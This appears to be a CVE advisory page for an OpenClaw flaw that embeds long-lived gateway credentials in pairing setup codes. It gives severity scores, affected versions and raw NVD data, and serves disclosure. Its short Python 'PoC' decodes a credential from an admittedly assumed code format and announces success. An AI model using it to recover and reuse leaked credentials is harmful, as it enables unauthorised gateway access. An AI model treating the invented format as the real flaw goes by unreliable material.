Security Vulnerability Report
CVE-2026-33575 CVSS 7.5 HIGH

CVE-2026-33575

Published: 2026-03-29 13:17:03
Last Modified: 2026-03-30 15:51:27

Description

OpenClaw before 2026.3.12 embeds long-lived shared gateway credentials directly in pairing setup codes generated by the /pair endpoint and the OpenClaw qr command. Attackers with access to leaked setup codes from chat history, logs, or screenshots can recover and reuse the shared gateway credential outside the intended one-time pairing flow.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import base64
import binascii

# Simulated PoC for CVE-2026-33575
# Description: Extracting long-lived credentials from a leaked OpenClaw pairing code.
# The "setup_token:<base64_credential>" layout below is an assumed format used
# for illustration only.

MARKER = "setup_token:"


def extract_credential_from_pairing_code(pairing_code):
    """
    Parses the pairing code to retrieve the embedded gateway credential.
    In a real scenario, this might involve base64 decoding or parsing a
    specific string format.

    Returns the decoded credential, or None if the code does not match the
    assumed format or cannot be decoded.
    """
    if MARKER not in pairing_code:
        return None
    # Everything after the marker is treated as the base64-encoded credential.
    encoded_part = pairing_code.split(MARKER, 1)[1]
    try:
        return base64.b64decode(encoded_part, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


# Simulated leaked pairing code found in logs/chat
leaked_code = "pairing_setup_v1_setup_token:c2hhcmVkX2dhdGV3YXlfc2VjcmV0X2tleQ=="
print(f"[*] Analyzing leaked pairing code: {leaked_code}")
credential = extract_credential_from_pairing_code(leaked_code)
if credential is not None:
    print(f"[+] Exploit Successful! Recovered Gateway Credential: {credential}")
    print("[+] Attacker can now use this credential to access the gateway.")
else:
    print("[-] No embedded credential found in the pairing code.")
```

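References

https://github.com/openclaw/openclaw/security/advisories/GHSA-7h7g-x2px-94hj (Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-long-lived-credential-exposure-in-pairing-setup-codes (Third Party Advisory)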

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33575", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:03.370", "lastModified": "2026-03-30T15:51:26.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.12 embeds long-lived shared gateway credentials directly in pairing setup codes generated by /pair endpoint and OpenClaw qr command. Attackers with access to leaked setup codes from chat history, logs, or screenshots can recover and reuse the shared gateway credential outside the intended one-time pairing flow."}, {"lang": "es", "value": "OpenClaw antes de 2026.3.12 incrusta credenciales de puerta de enlace compartidas de larga duración directamente en los códigos de configuración de emparejamiento generados por el endpoint /pair y el comando qr de OpenClaw. Los atacantes con acceso a códigos de configuración filtrados del historial de chat, registros o capturas de pantalla pueden recuperar y reutilizar la credencial de puerta de enlace compartida fuera del flujo de emparejamiento único previsto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": 
"NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.12", "matchCriteriaId": "B90EC1D8-4E2B-46AF-8E66-B689693A16CE"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7h7g-x2px-94hj", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-long-lived-credential-exposure-in-pairing-setup-codes", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}